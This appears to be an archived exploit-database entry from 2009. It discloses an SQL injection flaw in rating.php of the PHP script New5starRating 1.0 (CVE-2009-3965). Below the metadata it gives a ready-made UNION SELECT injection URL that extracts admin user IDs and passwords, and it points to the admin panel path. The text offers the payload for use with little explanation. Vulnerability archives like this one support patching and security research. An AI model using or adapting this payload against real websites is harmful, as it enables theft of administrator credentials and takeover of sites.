New5starRating 1.0 - 'rating.php' SQL Injection

Author: Bgh7
type: webapps
platform: php
port: 
date_added: 2009-08-23  
date_updated:   
verified: 1  
codes: OSVDB-60418;CVE-2009-3965  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 9499.txt  

New5starRating v1.0 (rating.php) Sql Inj. Vuln.
##################
Yazar: Bgh7
Turk Bilisim Gucleri
##################
Download;
http://www.maniacomputer.com/5star_rating/New_5Star.html
Bug-->Sql Inj.
##################
Exp: rating.php?det=-1 union select userid,0,0,userpass from admin
Panel: /admin/
##################
Thanks: milw0rm-->Str0ke

# milw0rm.com [2009-08-24]